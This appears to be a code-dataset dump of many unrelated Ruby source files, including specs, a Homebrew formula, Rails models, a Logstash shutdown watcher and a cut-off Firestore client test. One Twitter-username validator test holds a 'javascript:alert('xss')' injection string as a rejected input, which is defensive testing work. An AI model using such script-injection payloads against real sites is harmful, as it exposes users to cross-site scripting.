hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
5d2ebb9a20f66e53e103a72f2000ffdd071aa929 | 1,075 | # frozen_string_literal: true
Capybara::SpecHelper.spec '#has_style?', requires: [:css] do
before do
@session.visit('/with_html')
end
it "should be true if the element has the given style" do
expect(@session.find(:css, '#first')).to have_style(display: 'block')
expect(@session.find(:css, '#first').has_style?(display: 'block')).to be true
expect(@session.find(:css, '#second')).to have_style('display' => 'inline')
expect(@session.find(:css, '#second').has_style?('display' => 'inline')).to be true
end
it "should be false if the element does not have the given style" do
expect(@session.find(:css, '#first').has_style?('display' => 'inline')).to be false
expect(@session.find(:css, '#second').has_style?(display: 'block')).to be false
end
it "allows Regexp for value matching" do
expect(@session.find(:css, '#first')).to have_style(display: /^bl/)
expect(@session.find(:css, '#first').has_style?('display' => /^bl/)).to be true
expect(@session.find(:css, '#first').has_style?(display: /^in/)).to be false
end
end
| 41.346154 | 87 | 0.663256 |
ed493bdd88268a30ef59a4b69bcbf1986a5df927 | 6,324 | # coding: utf-8
require 'test_helper'
ActiveValidators.activate(:twitter)
describe "Twitter Validation" do
def build_twitter_record format, attrs = {}
TestRecord.reset_callbacks(:validate)
TestRecord.validates :twitter_username, :twitter => format
TestRecord.new attrs
end
it "rejects invalid urls" do
subject = build_twitter_record true
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generates an error message of type blank" do
subject = build_twitter_record true
_(subject.valid?).must_equal(false)
message = subject.errors.generate_message(:twitter_username, :blank)
_(subject.errors[:twitter_username].include?(message)).must_equal(true)
end
describe "for twitter url validator" do
it "validates with http" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'http://twitter.com/garrettb'
_(subject.valid?).must_equal(true)
end
it "validates with https protocol" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'https://twitter.com/garrettb'
_(subject.valid?).must_equal(true)
end
it "generate error with ftp protocol" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'ftp://twitter.com/garrettb'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "validates with www and http" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'http://www.twitter.com/garrettb'
_(subject.valid?).must_equal(true)
end
it "generate error without www dot" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'http://wwwtwitter.com/garrettb'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error without no username" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'http://twitter.com'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error without no username and trailing slash" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'http://twitter.com/'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with too long of username" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'http://twitter.com/garrettbjerkhoelwashere'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with invalid character" do
subject = build_twitter_record :format => :url
subject.twitter_username = 'http://twitter.com/garrettbjerkhoé'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generates error with injected content" do
subject = build_twitter_record :format => :url
subject.twitter_username = "javascript:alert('xss');\nhttp://twitter.com/garrettbjerkhoelwashere"
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
end
describe "for twitter at sign validator" do
it "validate with valid username" do
subject = build_twitter_record :format => :username_with_at
subject.twitter_username = '@garrettb'
_(subject.valid?).must_equal(true)
end
it "validate with one character" do
subject = build_twitter_record :format => :username_with_at
subject.twitter_username = '@a'
_(subject.valid?).must_equal(true)
end
it "generate error with too long of username" do
subject = build_twitter_record :format => :username_with_at
subject.twitter_username = '@garrettbjerkhoelwashere'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with no username" do
subject = build_twitter_record :format => :username_with_at
subject.twitter_username = '@'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with invalid character" do
subject = build_twitter_record :format => :username_with_at
subject.twitter_username = '@érik'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with injected content" do
subject = build_twitter_record :format => :username_with_at
subject.twitter_username = "injected\n@erik"
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
end
describe "for twitter without at sign validator" do
it "validate with valid username" do
subject = build_twitter_record true
subject.twitter_username = 'garrettb'
_(subject.valid?).must_equal(true)
end
it "validate with one character" do
subject = build_twitter_record true
subject.twitter_username = 'a'
_(subject.valid?).must_equal(true)
end
it "generate error with too long of username" do
subject = build_twitter_record true
subject.twitter_username = 'garrettbjerkhoelwashere'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with no username" do
subject = build_twitter_record true
subject.twitter_username = ''
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with invalid character" do
subject = build_twitter_record true
subject.twitter_username = 'érik'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with at sign character" do
subject = build_twitter_record true
subject.twitter_username = '@garrettb'
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
it "generate error with at injected data" do
subject = build_twitter_record true
subject.twitter_username = "something\ngarrettb\nelse"
_(subject.valid?).must_equal(false)
_(subject.errors.size).must_equal(1)
end
end
end
| 34 | 103 | 0.694497 |
b9860f2834efb6f551395000b6cf8e56dcde01d5 | 2,204 | class H2o < Formula
homepage "https://github.com/h2o/h2o/"
url "https://github.com/h2o/h2o/archive/v0.9.2.tar.gz"
sha1 "001f5aefcd829467ed64b328ff0d35b736593dec"
head "https://github.com/h2o/h2o.git"
bottle do
sha1 "3a661417da4cf981935b3ec39a9e0401ce0cfb30" => :yosemite
sha1 "046477212770943f9e039fb73608d393cb5d6c61" => :mavericks
sha1 "1e4bf69b5e1f81c0b5c1bca54928643b613f312c" => :mountain_lion
end
option "with-libuv", "Build the H2O library in addition to the executable."
depends_on "cmake" => :build
depends_on "libyaml"
depends_on "openssl"
depends_on "libuv" => :optional
def install
system "cmake", ".", *std_cmake_args
if build.with? "libuv"
system "make", "libh2o"
lib.install "libh2o.a"
end
system "make", "install"
mkdir_p etc/"h2o"
mkdir_p var/"h2o"
(var+"h2o").install "examples/doc_root/index.html"
# Write up a basic example conf for testing.
(buildpath+"brew/h2o.conf").write conf_example
(etc+"h2o").install buildpath/"brew/h2o.conf"
end
# This is simplified from examples/h2o/h2o.conf upstream.
def conf_example; <<-EOS.undent
listen: 8080
hosts:
"127.0.0.1.xip.io:8080":
paths:
/:
file.dir: #{var}/h2o/
EOS
end
def caveats; <<-EOS.undent
A basic example configuration file has been placed in #{etc}/h2o.
You can find fuller, unmodified examples here:
https://github.com/h2o/h2o/tree/master/examples/h2o
EOS
end
plist_options :manual => "h2o"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/h2o</string>
<string>-c</string>
<string>#{etc}/h2o/h2o.conf</string>
</array>
</dict>
</plist>
EOS
end
test do
system bin/"h2o", "--version"
end
end
| 26.238095 | 106 | 0.624319 |
bf29c8671ecaae8cf5d7e51e9fe5946e40b6f7a6 | 418 | require_dependency 'core/application_record'
module Core
module SocialWork
class ProjectInteraction < ApplicationRecord
self.table_name = 'generic.social_work_project_interactions'
attr_accessor :type
belongs_to :candidate_project
mount_uploader :document_one, Core::SocialWork::DocumentUploader
mount_uploader :document_two, Core::SocialWork::DocumentUploader
end
end
end
| 26.125 | 70 | 0.77512 |
abce111eeef86bb3145efc36167f46918976601b | 3,483 | # encoding: utf-8
require "concurrent/atomic/atomic_fixnum"
require "concurrent/atomic/atomic_boolean"
module LogStash
class ShutdownWatcher
include LogStash::Util::Loggable
CHECK_EVERY = 1 # second
REPORT_EVERY = 5 # checks
ABORT_AFTER = 3 # stalled reports
attr_reader :cycle_period, :report_every, :abort_threshold
def initialize(pipeline, cycle_period=CHECK_EVERY, report_every=REPORT_EVERY, abort_threshold=ABORT_AFTER)
@pipeline = pipeline
@cycle_period = cycle_period
@report_every = report_every
@abort_threshold = abort_threshold
@reports = []
@attempts_count = Concurrent::AtomicFixnum.new(0)
@running = Concurrent::AtomicBoolean.new(false)
end
def self.unsafe_shutdown=(boolean)
@unsafe_shutdown = boolean
end
def self.unsafe_shutdown?
@unsafe_shutdown
end
def self.start(pipeline, cycle_period=CHECK_EVERY, report_every=REPORT_EVERY, abort_threshold=ABORT_AFTER)
controller = self.new(pipeline, cycle_period, report_every, abort_threshold)
Thread.new(controller) { |controller| controller.start }
end
def logger
self.class.logger
end
def attempts_count
@attempts_count.value
end
def stop!
@running.make_false
end
def stopped?
@running.false?
end
def start
sleep(@cycle_period)
cycle_number = 0
stalled_count = 0
running!
Stud.interval(@cycle_period) do
@attempts_count.increment
break if stopped?
break unless @pipeline.thread.alive?
@reports << pipeline_report_snapshot
@reports.delete_at(0) if @reports.size > @report_every # expire old report
if cycle_number == (@report_every - 1) # it's report time!
logger.warn(@reports.last.to_s)
if shutdown_stalled?
logger.error("The shutdown process appears to be stalled due to busy or blocked plugins. Check the logs for more information.") if stalled_count == 0
stalled_count += 1
if self.class.unsafe_shutdown? && @abort_threshold == stalled_count
logger.fatal("Forcefully quitting logstash..")
force_exit()
break
end
else
stalled_count = 0
end
end
cycle_number = (cycle_number + 1) % @report_every
end
ensure
stop!
end
def pipeline_report_snapshot
@pipeline.reporter.snapshot
end
# A pipeline shutdown is stalled if
# * at least REPORT_EVERY reports have been created
# * the inflight event count is in monotonically increasing
# * there are worker threads running which aren't blocked on SizedQueue pop/push
# * the stalled thread list is constant in the previous REPORT_EVERY reports
def shutdown_stalled?
return false unless @reports.size == @report_every #
# is stalled if inflight count is either constant or increasing
stalled_event_count = @reports.each_cons(2).all? do |prev_report, next_report|
prev_report.inflight_count <= next_report.inflight_count
end
if stalled_event_count
@reports.each_cons(2).all? do |prev_report, next_report|
prev_report.stalling_threads == next_report.stalling_threads
end
else
false
end
end
def force_exit
exit(-1)
end
private
def running!
@running.make_true
end
end
end
| 28.785124 | 161 | 0.664944 |
79668e029d1b9d3ace8b4cd61331cb4fc444811a | 852 | module Lol
# Holds the representation of a MiniSeries
class MiniSeries < Model
# @!attribute [r] target
# @return [String] number of games required to advance
attr_reader :target
# @!attribute [r] wins
# @return [Fixnum] wins in the miniseries
attr_reader :wins
# @!attribute [r] losses
# @return [Fixnum] losses in the miniseries
attr_reader :losses
# @!attribute [r] time_left_to_play_millis
# @return [Fixnum] time left to play the miniseries, expressed in milliseconds
attr_reader :time_left_to_play_millis
# @!attribute [r] progress
# @return [String] string representation of the miniseries progress.
# i.e. "WLN" (Win / Loss / Not played)
attr_reader :progress
private
attr_writer :target, :wins, :losses, :time_left_to_play_millis, :progress
end
end
| 28.4 | 82 | 0.681925 |
f793ca305b64dffd1997efe0508797f5390c618e | 190 | FactoryGirl.define do
factory :user, :class => Mtwarden::User do
sequence(:email) { |n| "test#{n}@example.com" }
password "password"
password_confirmation "password"
end
end
| 23.75 | 51 | 0.678947 |
613b78bafd1d85445714d4bd010fc80b7cbf3c50 | 280 | Erp::Backend::Engine.routes.draw do
root to: "frontend/home#index", as: "home"
get "/products", to: "frontend/products#index", as: :products
get "/products/:id", to: "frontend/products#detail", as: :product_detail
get "/blogs", to: "frontend/blogs#index", as: :blogs
end
| 35 | 74 | 0.685714 |
211e2a41b5dd3839ac98e47680da8788990d4c00 | 717 | capitais = Hash.new
capitais = {acre: 'Rio Branco', sao_paulo: 'São Paulo', }
#atribuindo novo valor
capitais[:minas_gerais] = 'Belo Horizonte'
puts capitais
#imprimindo as chaves
puts "\n"
puts 'chaves:'
puts capitais.keys
#imprimindo os valores
puts "\n"
puts 'values:'
puts capitais.values
#######################################
#deletando elementos
capitais.delete(:acre)
puts 'Depois de deletar:'
puts capitais
#imprimindo as chaves
puts "\n"
puts 'chaves:'
puts capitais.keys
#imprimindo os valores
puts "\n"
puts 'values:'
puts capitais.values
#selecionando valor
puts "\n"
puts capitais[:sao_paulo]
#verifica o tamanho
puts capitais.size
#verifica se o Hash está cheio ou vazio
puts capitais.empty?
| 16.674419 | 57 | 0.709902 |
1cd6aba3249c85cfab93659c7e00f4cd1b040a2b | 198 | require 'test_helper'
class CoolrTest < Minitest::Test
def test_that_it_has_a_version_number
refute_nil ::Coolr::VERSION
end
def test_it_does_something_useful
assert false
end
end
| 16.5 | 39 | 0.777778 |
1afa801470aaa4408c63603e3c294247dd9f08f6 | 1,140 | # frozen_string_literal: true
module CscCore
module ExcelBuilders
class ProposedIndicatorExcelBuilder
attr_accessor :sheet
def initialize(sheet, scorecards)
@sheet = sheet
@scorecards = scorecards
end
def build
build_header
@scorecards.includes(:raised_indicators).each do |scorecard|
build_row(scorecard)
end
end
def build_header
sheet.add_row [
I18n.t("excel.scorecard_id"),
I18n.t("excel.participant_id"),
I18n.t("excel.indicator_id"),
I18n.t("excel.seleted_for_implementation")
]
end
def build_row(scorecard)
scorecard.raised_indicators.sort_by(&:participant_uuid).each do |raised_indicator|
sheet.add_row generate_row(raised_indicator, scorecard)
end
end
private
def generate_row(raised_indicator, scorecard)
[
scorecard.uuid,
raised_indicator.participant_uuid,
raised_indicator.indicator_uuid,
raised_indicator.selected?
]
end
end
end
end
| 23.75 | 90 | 0.616667 |
e99aa0595095e9303600e77f6b4d62f0a6a79a3f | 384 | # encoding: utf-8
class CsvUtils
def self.header( path, sep: ',', debug: false ) ## use header or headers - or use both (with alias)?
row = CsvReader.header( path, sep: sep )
pp row if debug
## e.g.:
# "Country,League,Season,Date,Time,Home,Away,HG,AG,Res,PH,PD,PA,MaxH,MaxD,MaxA,AvgH,AvgD,AvgA\n"
row
end # method self.header
end # class CsvUtils
| 22.588235 | 104 | 0.635417 |
39501ca99cafd7d20a87c6e931c9b15c0140852f | 233 | def simple_calculator(nb1, nb2)
addition = nb1 + nb2
substraction = nb1 - nb2
multiplication = nb1 * nb2
division = nb1 / nb2
puts "#{addition}, #{substraction}, #{multiplication}, #{division}"
end
simple_calculator(5, 2)
| 23.3 | 69 | 0.686695 |
03200a9559ac171cec578cb9c90705db9515f2ab | 5,299 | require 'possibly'
module Import
module Brca
module Providers
module Salisbury
# Process Salisbury-specific record details into generalized internal genotype format
class SalisburyHandlerDeprecated < Import::Brca::Core::ProviderHandler
TEST_SCOPE_MAPPING = { 'breast cancer full screen' => :full_screen,
'breast cancer full screen data only' => :full_screen,
'brca mainstreaming' => :full_screen,
'breast cancer predictives' => :targeted_mutation,
'brca mlpa only' => :targeted_mutation,
'brca ashkenazi mutations' => :aj_screen } .freeze
TEST_TYPE_MAPPING = { 'breast cancer full screen' => :diagnostic,
'breast cancer full screen data only' => :diagnostic,
'brca mainstreaming' => :diagnostic,
'brca mlpa only' => :predictive,
'breast cancer predictives' => :predictive,
'brca ashkenazi mutations' => nil } .freeze
PASS_THROUGH_FIELDS = %w[age consultantcode
servicereportidentifier
providercode
authoriseddate
requesteddate].freeze
POSITIVE_TEST = /variant|pathogenic|deletion/i.freeze
FAILED_TEST = /Fail*+/i.freeze
GENE_REGEX = /B(?:R)?(?:C)?(?:A)?(1|2)(?:_(\d*[A-Z]*))?/i.freeze
GENE_LOCATION_REGEX = /.*c\.(?<gene>[^ ]+)(?: p\.\((?<protein>.*)\))?.*/i.freeze
EXON_LOCATION_REGEX = /exons? (\d+[a-z]*(?: ?- ?\d+[a-z]*)?)/i.freeze
# TODO: make this more conservative
DEL_DUP_REGEX = /(?:\W*(del)(?:etion|[^\W])?)|(?:\W*(dup)(?:lication|[^\W])?)/i.freeze
def initialize(batch)
super
@logger.level = Logger::INFO
end
def process_fields(record)
genotype = Import::Brca::Core::Genotype.new(record)
extract_gene(record.raw_fields['test'], genotype)
extract_variant(record.raw_fields['genotype'], genotype)
Maybe(record.raw_fields['moleculartestingtype']).each do |ttype|
genotype.add_molecular_testing_type_strict(TEST_TYPE_MAPPING[ttype])
scope = TEST_SCOPE_MAPPING[ttype.downcase.strip]
genotype.add_test_scope(scope) if scope
end
extract_teststatus(genotype, record)
add_organisationcode_testresult(genotype)
genotype.add_specimen_type(record.mapped_fields['specimentype'])
genotype.add_received_date(record.raw_fields['date of receipt'])
genotype.add_passthrough_fields(record.mapped_fields,
record.raw_fields,
PASS_THROUGH_FIELDS)
@persister.integrate_and_store(genotype)
end
def add_organisationcode_testresult(genotype)
genotype.attribute_map['organisationcode_testresult'] = '699H0'
end
def extract_gene(test_string, genotype)
if test_string.scan(GENE_REGEX).size > 1
@logger.error "Multiple genes detected in input string: #{test_string};"\
'record will be incomplete!'
end
Maybe(GENE_REGEX.match(test_string)).
map { |match| match[1].to_i }.
map { |gene| genotype.add_gene(gene) }.
or_else { @logger.error "Cannot extract gene name from raw test: #{test_string}" }
end
def extract_teststatus(genotype, record)
if POSITIVE_TEST.match(record.raw_fields['status'])
genotype.add_status(:positive)
@logger.debug "POSITIVE status for : #{record.raw_fields['status']}"
elsif FAILED_TEST.match(record.raw_fields['status'])
genotype.add_status(:failed)
@logger.debug "FAILED status for : #{record.raw_fields['status']}"
else genotype.add_status(:negative)
end
end
def extract_variant(genotype_string, genotype)
matches = GENE_LOCATION_REGEX.match(genotype_string)
exon_matches = EXON_LOCATION_REGEX.match(genotype_string)
if genotype_string.blank?
genotype.set_negative # TODO: what is the desired value to put in here? Negative?
return
end
if matches
genotype.add_gene_location(matches[:gene]) if matches[1]
genotype.add_protein_impact(matches[:protein]) if matches[2]
elsif exon_matches
genotype.add_exon_location(exon_matches[1].delete(' '))
genotype.add_variant_type(genotype_string)
else
@logger.warn "Cannot extract gene location from raw test: #{genotype_string}"
end
end
end
end
end
end
end
| 49.064815 | 96 | 0.543687 |
edf06c9a040dd42500583e3c447511678fbec1f4 | 4,287 | require 'json-schema'
module GeoConcerns
module Discovery
class GeoblacklightDocument < AbstractDocument
# Implements the to_hash method on the abstract document.
# @param _args [Array<Object>] arguments needed for the renderer, unused here
# @return [Hash] geoblacklight document as a hash
def to_hash(_args = nil)
document
end
# Implements the to_json method on the abstract document.
# @param _args [Array<Object>] arguments needed for the json renderer, unused here
# @return [String] geoblacklight document as a json string
def to_json(_args = nil)
document.to_json
end
private
# Builds the geoblacklight document hash.
# @return [Hash] geoblacklight document as a hash
# rubocop:disable Metrics/MethodLength, Metrics/AbcSize
def document_hash
{
uuid: id,
dc_identifier_s: identifier,
dc_title_s: title.first,
dc_description_s: description,
dc_rights_s: rights,
dct_provenance_s: provenance.first,
dc_creator_sm: creator,
dc_language_s: language.first,
dc_publisher_s: publisher.first,
dc_subject_sm: subject,
dct_spatial_sm: spatial,
dct_temporal_sm: temporal,
layer_slug_s: slug,
georss_box_s: geo_rss_coverage,
solr_geom: solr_coverage,
solr_year_i: layer_year,
layer_modified_dt: date_modified,
layer_id_s: wxs_identifier,
dct_references_s: clean_document(references).to_json,
layer_geom_type_s: geom_type,
dc_format_s: process_format_codes(format)
}
end
# rubocop:enable Metrics/LineLength, Metrics/AbcSize
# Builds the dct_references hash.
# @return [Hash] geoblacklight references as a hash
def references
{
'http://schema.org/url' => url,
'http://www.opengis.net/cat/csw/csdgm' => fgdc,
'http://www.isotc211.org/schemas/2005/gmd/' => iso19139,
'http://www.loc.gov/mods/v3' => mods,
'http://schema.org/downloadUrl' => download,
'http://schema.org/thumbnailUrl' => thumbnail
}
end
# Returns the geoblacklight rights field based on work visibility.
# @return [String] geoblacklight access rights
def rights
if access_rights == Hydra::AccessControls::AccessRight::VISIBILITY_TEXT_VALUE_PUBLIC
'Public'
else
'Restricted'
end
end
# Transforms shapfile, tiff, and arc grid format codes into geoblacklight format codes.
# @return [String] geoblacklight format codes
def process_format_codes(format)
case format
when 'ESRI Shapefile'
'Shapefile'
when 'GTiff'
'GeoTIFF'
when 'AIG'
'ArcGRID'
else
format
end
end
# Returns the location of geoblacklight json schema document.
# @return [String] geoblacklight json schema document path
def schema
Rails.root.join('config', 'discovery', 'geoblacklight_schema.json').to_s
end
# Validates the geoblacklight document against the json schema.
# @return [Boolean] is the document valid?
def valid?(doc)
JSON::Validator.validate(schema, doc, validate_schema: true)
end
# Returns a hash of errors from json schema validation.
# @return [Hash] json schema validation errors
def schema_errors(doc)
{ error: JSON::Validator.fully_validate(schema, doc) }
end
# Cleans the geoblacklight document hash by removing unused fields,
# then validates it again a json schema. If there are errors, an
# error hash is returned, otherwise, the cleaned doc is returned.
# @return [Hash] geoblacklight document hash or error hash
def document
clean = clean_document(document_hash)
if valid?(clean)
clean
else
schema_errors(clean)
end
end
end
end
end
| 34.853659 | 95 | 0.606018 |
874595aa9344f2f1de16f2866255f780646e5353 | 203 | class Question < ActiveRecord::Base
attr_accessible :content, :survey_id, :answers_attributes
belongs_to :survey
has_many :answers
accepts_nested_attributes_for :answers, allow_destroy: true
end
| 29 | 61 | 0.812808 |
91e36bba73ef33e8815ac9512c2046f0ad38235c | 198 | # frozen_string_literal: true
class RenameTypeToMenuItemType < ActiveRecord::Migration[6.1]
def change
change_table :menu_items do |t|
t.rename :type, :menu_item_type
end
end
end
| 19.8 | 61 | 0.732323 |
33d7de391cbaa98a013483c4d9e4933b12e4d2dd | 48,730 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/firestore/v1/firestore_pb"
require "google/firestore/v1/firestore_services_pb"
require "google/cloud/firestore/v1/firestore"
class ::Google::Cloud::Firestore::V1::Firestore::ClientTest < Minitest::Test
class ClientStub
attr_accessor :call_rpc_count, :requests
def initialize response, operation, &block
@response = response
@operation = operation
@block = block
@call_rpc_count = 0
@requests = []
end
def call_rpc *args, **kwargs
@call_rpc_count += 1
@requests << @block&.call(*args, **kwargs)
yield @response, @operation if block_given?
@response
end
end
def test_get_document
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::Document.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
mask = {}
transaction = "hello world"
get_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_document, name
assert_kind_of ::Google::Cloud::Firestore::V1::GetDocumentRequest, request
assert_equal "hello world", request["name"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
assert_equal "hello world", request["transaction"]
assert_equal :transaction, request.consistency_selector
refute_nil options
end
Gapic::ServiceStub.stub :new, get_document_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_document({ name: name, mask: mask, transaction: transaction }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_document name: name, mask: mask, transaction: transaction do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_document ::Google::Cloud::Firestore::V1::GetDocumentRequest.new(name: name, mask: mask, transaction: transaction) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_document({ name: name, mask: mask, transaction: transaction }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_document ::Google::Cloud::Firestore::V1::GetDocumentRequest.new(name: name, mask: mask, transaction: transaction), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_document_client_stub.call_rpc_count
end
end
def test_list_documents
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::ListDocumentsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
collection_id = "hello world"
page_size = 42
page_token = "hello world"
order_by = "hello world"
mask = {}
transaction = "hello world"
show_missing = true
list_documents_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_documents, name
assert_kind_of ::Google::Cloud::Firestore::V1::ListDocumentsRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["collection_id"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
assert_equal "hello world", request["order_by"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
assert_equal "hello world", request["transaction"]
assert_equal :transaction, request.consistency_selector
assert_equal true, request["show_missing"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_documents_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_documents({ parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_documents parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_documents ::Google::Cloud::Firestore::V1::ListDocumentsRequest.new(parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_documents({ parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_documents ::Google::Cloud::Firestore::V1::ListDocumentsRequest.new(parent: parent, collection_id: collection_id, page_size: page_size, page_token: page_token, order_by: order_by, mask: mask, transaction: transaction, show_missing: show_missing), grpc_options do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_documents_client_stub.call_rpc_count
end
end
def test_update_document
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::Document.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
document = {}
update_mask = {}
mask = {}
current_document = {}
update_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :update_document, name
assert_kind_of ::Google::Cloud::Firestore::V1::UpdateDocumentRequest, request
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Document), request["document"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["update_mask"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Precondition), request["current_document"]
refute_nil options
end
Gapic::ServiceStub.stub :new, update_document_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.update_document({ document: document, update_mask: update_mask, mask: mask, current_document: current_document }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.update_document document: document, update_mask: update_mask, mask: mask, current_document: current_document do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.update_document ::Google::Cloud::Firestore::V1::UpdateDocumentRequest.new(document: document, update_mask: update_mask, mask: mask, current_document: current_document) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.update_document({ document: document, update_mask: update_mask, mask: mask, current_document: current_document }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.update_document ::Google::Cloud::Firestore::V1::UpdateDocumentRequest.new(document: document, update_mask: update_mask, mask: mask, current_document: current_document), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, update_document_client_stub.call_rpc_count
end
end
def test_delete_document
# Create GRPC objects.
grpc_response = ::Google::Protobuf::Empty.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
